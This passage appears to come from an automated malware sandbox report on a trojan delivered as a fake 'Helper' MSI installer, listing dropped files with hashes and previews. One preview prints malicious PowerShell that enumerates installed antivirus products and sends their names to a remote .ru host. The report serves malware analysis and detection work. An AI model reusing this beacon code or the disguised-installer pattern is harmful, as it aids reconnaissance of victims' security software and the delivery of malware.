                                                                                                                                                                      • Filename: id-Processo_Z5TGVQUK.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: id-Processo_Z5TGVQUK.msi, Detection: malicious, Browse
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Pro77F9.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1500
                                                                                                                                                                      Entropy (8bit):4.229107273934832
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:m53r/bG/Q8SMgu5Yl6ux+3wa53r/bG/Q1+Mgu5Yl/ax+3v:wTy/QuglllwAMTy/Q1Tgll/awf
                                                                                                                                                                      MD5:511C85632F2481E3224EB4316387BBEB
                                                                                                                                                                      SHA1:DC05BF165B266D07AA51F6FDBCE2BBD5DC4EB9D2
                                                                                                                                                                      SHA-256:514D22DB04F1C9309F078D9345B12AD2BCA09D4EC7BFE7ADAB13B34157D3EF28
                                                                                                                                                                      SHA-512:0D5BB2F0DB781D4773B247CB4E25D121AD63D6CA37E999DE0A49C715A6C284E99898E8667ABF45C3EC31D115EBB3CF838133F1202A4F9E3E65700E2F982BE9AB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:....StatusCode : 200..StatusDescription : OK..Content : ..RawContent : HTTP/1.1 200 OK.. Connection: close.. Content-Length: 0.. Content-Type: text/html; charset=UTF-8.. Date: Mon, 21 Aug 2023 17:35:21 GMT.. Server: Apache/2.4.6 (CentOS) PHP/7.4.33.. X-Powered-By: PHP/7.4.33.. .....Forms : ..Headers : {[Connection, close], [Content-Length, 0], [Content-Type, text/html; charset=UTF-8], [Date, Mon, .. 21 Aug 2023 17:35:21 GMT]...}..Images : {}..InputFields : {}..Links : {}..ParsedHtml : ..RawContentLength : 0......StatusCode : 200..StatusDescription : OK..Content : ..RawContent : HTTP/1.1 200 OK.. Connection: close.. Content-Length: 0.. Content-Type: text/html; charset=UTF-8..

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21wkczwf.avt.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsgfsper.gjd.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\pss77D9.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6668
                                                                                                                                                                      Entropy (8bit):3.5127462716425657
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:5Wb5VNkKmeHn/V2BVrIovmgNlGjxcj6BngOcvjb:5WbyZ/gVyvb
                                                                                                                                                                      MD5:30C30EF2CB47E35101D13402B5661179
                                                                                                                                                                      SHA1:25696B2AAB86A9233F19017539E2DD83B2F75D4E
                                                                                                                                                                      SHA-256:53094DF6FA4E57A3265FF04BC1E970C10BCDB3D4094AD6DD610C05B7A8B79E0F
                                                                                                                                                                      SHA-512:882BE2768138BB75FF7DDE7D5CA4C2E024699398BAACD0CE1D4619902402E054297E4F464D8CB3C22B2F35D3DABC408122C207FACAD64EC8014F2C54834CF458
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".l.i.n.e.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.L.i.n.e.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scr77D6.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1854
                                                                                                                                                                      Entropy (8bit):3.7148687475785183
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:zB3tAnN1sAT1X1t+nWi2JgJ/yFTqDkagcv:V9AHsEX1tsWtJgkq9gcv
                                                                                                                                                                      MD5:FEEA20931D1BB33EFE4B4FEA34A34007
                                                                                                                                                                      SHA1:A77160427861E12AC9D860E40B3126E6C7F1AD9B
                                                                                                                                                                      SHA-256:BCD9751A982C594D84C8EDBDF4CB9E9DF6B12E4E20528074CECC1453881A1314
                                                                                                                                                                      SHA-512:ABCFA0C5CB82311C365AFFA786FA04E4B6DEDD6C0E4F4CFF9342EBAA423387A16512CF414A9C24CDB6833B018B82A1FD29F25DF73B89DFE74176E6B7343D2C5F
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:..I.n.v.o.k.e.-.W.e.b.R.e.q.u.e.s.t. .-.U.r.i. .(.".h.t.t.p.s.:././.p.r.k.l.-.a.d.s...r.u.?.s.t.a.t.u.s.=.r.e.g.&.k.e.y.=.l.l.k.s.7.4.6.3.8.s.j.&.s.i.t.e.=.T.e.s.t.".). .-.U.s.e.B.a.s.i.c.P.a.r.s.i.n.g.........s.l.e.e.p. .-.M.i.l.l.i.s.e.c.o.n.d.s. .1.2.9.7.........[.N.e.t...S.e.r.v.i.c.e.P.o.i.n.t.M.a.n.a.g.e.r.].:.:.S.e.c.u.r.i.t.y.P.r.o.t.o.c.o.l. .=. .[.N.e.t...S.e.c.u.r.i.t.y.P.r.o.t.o.c.o.l.T.y.p.e.].:.:.T.l.s.1.2.....$.A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .=. .G.e.t.-.W.m.i.O.b.j.e.c.t. .-.N.a.m.e.s.p.a.c.e. .".r.o.o.t.\.S.e.c.u.r.i.t.y.C.e.n.t.e.r.2.". .-.C.l.a.s.s. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t.....$.d.i.s.p.l.a.y.N.a.m.e.s. .=. .$.A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .|. .F.o.r.E.a.c.h.-.O.b.j.e.c.t. .{..... . . . .$._...d.i.s.p.l.a.y.N.a.m.e.....}.....$.d.i.s.p.l.a.y.N.a.m.e.s.S.t.r.i.n.g. .=. .$.d.i.s.p.l.a.y.N.a.m.e.s. .-.j.o.i.n. .".,. .".....$.u.r.l.1.1. .=. .".h.t.t.p.s.:././.p.r.k.l.-.a.d.s...r.u./.?.s.t.a.t.u.s.=.s.t.a.r.t.&.a.v.=.$.d.i.s.p.l.a.y.N.a.m.e.s.S.t.r.i.n.g."...

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\shi69FA.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3440640
                                                                                                                                                                      Entropy (8bit):6.332754172601424
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:iGfM3glOz6pNbH2qLG1cWJ2asQceg4LApnrkLgQ63lOT0q4Fn6rmLn:Lc3wFeyCulhqUn
                                                                                                                                                                      MD5:59A74284EACB95118CEDD7505F55E38F
                                                                                                                                                                      SHA1:ACDC28D6A1EF5C197DE614C46BA07AEAEB25B50B
                                                                                                                                                                      SHA-256:7C8EA70CA8EFB47632665833A6900E8F2836945AA80828B30DA73FBF4FCAF4F5
                                                                                                                                                                      SHA-512:E69A82ADC2D13B413C0689E9BF281704A5EF3350694690BA6F3FE20DA0F66396245B9756D52C37166013F971C79C124436600C373544321A44D71F75A16A2B6A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E..2..a..a..a..=aa.an..`..an..`..an..`..a..a..an..`..an..`..an..`l.an.Qa..an..`..aRich..a........................PE..d...5..r.........." .....n...H......P.........................................4.....g.4...`A........................................p.0.L&....0.......2......@1...............4......F'.T....................*..(....................q..8...Tc0......................text...o........................... ..`.wpp_sf.Y........................... ..`.rdata...Z.......\...r..............@..@.data....A....0.......0.............@....pdata.......@1.......0.............@..@.didat........2......V2.............@....rsrc.........2......b2.............@..@.reloc........4......b4.............@..B................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3E94FD11-3A35-44C9-B7E5-88560AB9D7CF}, Number of Words: 10, Subject: Helper, Author: Helper Company LLC, Name of Creating Application: Helper, Template: ;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2483712
                                                                                                                                                                      Entropy (8bit):6.553977992744686
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:Usz8r6I5WCmR+8zE37zIXX5U96RX5uzwJke7awlK2FV9fXlVeIf:Do6VE3re7a6f
                                                                                                                                                                      MD5:5CB6155D5FCC94F92C8B05AECD0C300B
                                                                                                                                                                      SHA1:D611E0353633D273702B9A751EDB4269C7E03536
                                                                                                                                                                      SHA-256:E62A37BA72977559C2776A7F20FE812CB890F6C8494DCF70CBCD314585F7E8E5
                                                                                                                                                                      SHA-512:793E7C416E558C93524335965FFCBCB2982B09D85E938510ABF0D9046E9F29C71E350EC3101F6EE50C071A4CBBC610C3267B5C18CE4BFD7918DCA9E949B32935
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi, Author: Joe Security
                                                                                                                                                                      Preview:......................>...................&...................................J.......c.......s.......................................m...n...o...p...q...r...s...t...u...v...w.......$...%...&...'...(...)...*...+...,...-...............................................................................................................................................................................................................................................................................................................................%...8........................................................................................... ...!..."...#...$.../...0...'...(...)...*...+...,...-...........1...6...2...3...4...5...9...7...@...C...:...;...<...=...>...?...$...A...B...L...D...E...F...G...H...I...%.......L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper1.cab

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                                                                                                                                      File Type:Microsoft Cabinet archive data, many, 1625945 bytes, 2 files, at 0x44 +A "z2201x64.exe" +A "icon.png", flags 0x4, ID 1234, number 1, extra bytes 20 in head, 51 datablocks, 0x1 compression
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1636377
                                                                                                                                                                      Entropy (8bit):7.999871457469054
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:24576:6/2i+GjI+uAld+dnnMT+EPZexEjXRfVLr5RfbZGTF37oO/ChJ8mtEMHnH:C1I+uE4nnMdx5fVD07oOdmtnH
                                                                                                                                                                      MD5:6738E7486358FFB12D914A2CE355DEF3
                                                                                                                                                                      SHA1:3DCB2576DAE364D198972030C20DB2903A1740C3
                                                                                                                                                                      SHA-256:02EFB04CA84D4140D4475F317D8E7810D07894E9865582DFD9C1EEF947C85A60
                                                                                                                                                                      SHA-512:6000841128D45CA522DF6B770ADDE47409A667E7F1E1C2A8BB61BBB0658C9604530F4B98A950310BDF3C9F2215A309F0ABF4B14021B8321CDBBF4954F15B0113
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:MSCF....Y.......D...........................Y....(..........z...3....3.........V.. .z2201x64.exe......3.....VA. .icon.png.....M..CK..x.U.0\.]I:....`.......6*...I.....B'...$1...:U..d...T.=......:..:3...."2.i.....B.v&hf.bg...4...[......w..{......{....[..c.1&.aX.T.a.2.?.......w.q....N.k....U..........kK....O...z{.z{...u5e.w..;&C...'...l.?t..(.............d..Z....[.Wby..Zo.......mj....eUk+......&......O...0..R...S.....".X.j...F.N.3r..4qW]...hE.;|.....N......p#...4.y..@.o..........g?.#T9z..?;.<qw..T(e.........P.u.V..@._.h...z.w.k.k.}..z....1.....O......;....._M...b.....R.6...<..0$...]L.I.p.Fh ....b...Y.'ZA>T.Z....+....V..V...A.B.R(Z+....8.o..h...6h....1...P=.h..R...W.....V.zZ.]l...[.].K....;sC.7.2.n.f...3...&@..6.Xb....9.V..I.OeUgX.t...q.&...ps.... Q...].....W9.`d....T.P.QM...P.h'.e.I.2..J.....V55....g.V...}.....7*....-.*!.|.4.<.....'p.p..(....[n@.V.+'.........BF..j....ym?.$....j.A.<..q......J.R.~.....aP.~ G:m.5}..d......R\..B........[

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\holder0.aiph

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1636377
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                      MD5:4122C39F1D4ACC64F4D4E505814B754E
                                                                                                                                                                      SHA1:181F83CDFDF4DC5FBC3B69EDAEA7A29093DE7FFA
                                                                                                                                                                      SHA-256:658F96AAA0B744D2B7965EEA945FB61AE29616E9E3446C7A9CF8D20B83198272
                                                                                                                                                                      SHA-512:2C8DD01A0645599F69B97408BBF466381CEC711168316D0C6565999F5C660D4CD090DCE6D0ABDEAA9D7E93BD3EB2BE96C60110EAF79E015F440989E27C599C74
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Helper Company LLC\Helper\7z2201-x64.exe

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1586120
                                                                                                                                                                      Entropy (8bit):7.996101897489759
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:24576:8GIyixBMj+/A2d+UKnvT+LwZWj7iDDVVYrz0rbzGTw3DoA/sk6smc:8Gbj+/BpKnvyIxVV/XDoAfmc
                                                                                                                                                                      MD5:F6F745D4ED6591DD99D5BF0405C4AD85
                                                                                                                                                                      SHA1:50E909F0206BF32D995D3BFFD1F9A37F41CA3386
                                                                                                                                                                      SHA-256:D788FAF6DF8C14A4333B4427747D873D003A124F3D7ADD420D72CA473305476C
                                                                                                                                                                      SHA-512:1F8FCE6A4A000005D319A69E63D4FF848BDC5C6C6FA43F93AD14042C0B7130094E67415C8EC563A42E515D14B038DE8C3774F0ED321E0493E2EC347225275CF5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.....xN..xN..xNd.rN..xN..vN..xNd.|N..xN..'N..xN..yNY.xN..%N..xN=.rN..xN.~N..xNRich..xN........................PE..L......b........../......h...N.......u............@.................................-v......................................t.......................@....(..............................................................L............................text...,g.......h.................. ..`.rdata..x............l..............@..@.data....(..........................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Helper Company LLC\Helper\icon.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PNG image data, 519 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60877
                                                                                                                                                                      Entropy (8bit):7.946799086000062
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:puSWyp4+uaXr58E7E9gzMs7kltmYvvxJZXPU:TWz+5Xd8WE9gzN7Stm8ZJZc
                                                                                                                                                                      MD5:0269218FAEE62DF36DE1E6C2D463A0A6
                                                                                                                                                                      SHA1:F2151D8964B842C6A7C6F43B71A9600F70EDDEB8
                                                                                                                                                                      SHA-256:C68E7ADB0CC03BFAE373FC028DB020C631E0543A65D00EE2A37DB24042C80020
                                                                                                                                                                      SHA-512:312BB32745DEDCE253E72587798D28CD45D14367892C1376BAE24867DA4370B108B50CF0036B12E5140A222E5323C47283B16B70473F9F0EE60F0F127DD90910
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG........IHDR....................sRGB.........gAMA......a.....pHYs..........o.d...bIDATx^...lE.......TP.Q..... I..A......$..$.9(((J. ..I. .p....%H....]............{..]a..]....../&K.(Q.W^{...+...^x!=....O..Sz.....w......._.:]t.E...H.sN:.3.q....;......i..vK;.S.v.m.f.m..[o...j...~..i.e.I./.xZd.E.B.-.>....}.s..........O|........>..f>.d..~.......k.Z.&..{.^.'.M...u.n..Rg.N.h.m.m....f.N.....}.%J.......D......=..o......%.....^|....s.g.y&=......O.>.hz..!.s.=..;.L7.|s.4iR..+..^....3.L'.pB:..c..G...<......?.x..i..wO.o.}.f.m..[l.6.h...:..W_=.....K_.RZb.%.../..|...H..7_6..|.3.S..T..'?9%A...>.:...;...........k......{S..B...u.......B.h.m.........}B..G..}F...%}J....5}N.3..E.(Q./.."9...G...k6...>.......lr|:......_.".r.)......o...{..K.o.qZ{...k........UW]5....i..WL.-.\....K...Z*-............/f..S>f>..y.'.=..i...J...g.....O.:.?..%|...;...........k......{S..B...u.......m.......}B..G..}F...%}J....5}N.3..E.(Q./.."9.......|.B.U...1)].....W^..;.t.I'...?

                                                                                                                                                                      C:\Windows\Installer\446fc6.msi

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3E94FD11-3A35-44C9-B7E5-88560AB9D7CF}, Number of Words: 10, Subject: Helper, Author: Helper Company LLC, Name of Creating Application: Helper, Template: ;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2483712
                                                                                                                                                                      Entropy (8bit):6.553977992744686
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:Usz8r6I5WCmR+8zE37zIXX5U96RX5uzwJke7awlK2FV9fXlVeIf:Do6VE3re7a6f
                                                                                                                                                                      MD5:5CB6155D5FCC94F92C8B05AECD0C300B
                                                                                                                                                                      SHA1:D611E0353633D273702B9A751EDB4269C7E03536
                                                                                                                                                                      SHA-256:E62A37BA72977559C2776A7F20FE812CB890F6C8494DCF70CBCD314585F7E8E5
                                                                                                                                                                      SHA-512:793E7C416E558C93524335965FFCBCB2982B09D85E938510ABF0D9046E9F29C71E350EC3101F6EE50C071A4CBBC610C3267B5C18CE4BFD7918DCA9E949B32935
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Windows\Installer\446fc6.msi, Author: Joe Security
                                                                                                                                                                      Preview:......................>...................&...................................J.......c.......s.......................................m...n...o...p...q...r...s...t...u...v...w.......$...%...&...'...(...)...*...+...,...-...............................................................................................................................................................................................................................................................................................................................%...8........................................................................................... ...!..."...#...$.../...0...'...(...)...*...+...,...-...........1...6...2...3...4...5...9...7...@...C...:...;...<...=...>...?...$...A...B...L...D...E...F...G...H...I...%.......L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                      C:\Windows\Installer\MSI7331.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):570784
                                                                                                                                                                      Entropy (8bit):6.450187144191945
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                                                                                                                                                      MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                                                                                                                                                      SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                                                                                                                                                      SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                                                                                                                                                      SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Installer\MSI73EE.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):570784
                                                                                                                                                                      Entropy (8bit):6.450187144191945
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                                                                                                                                                      MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                                                                                                                                                      SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                                                                                                                                                      SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                                                                                                                                                      SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Installer\MSI745C.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):570784
                                                                                                                                                                      Entropy (8bit):6.450187144191945
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                                                                                                                                                      MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                                                                                                                                                      SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                                                                                                                                                      SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
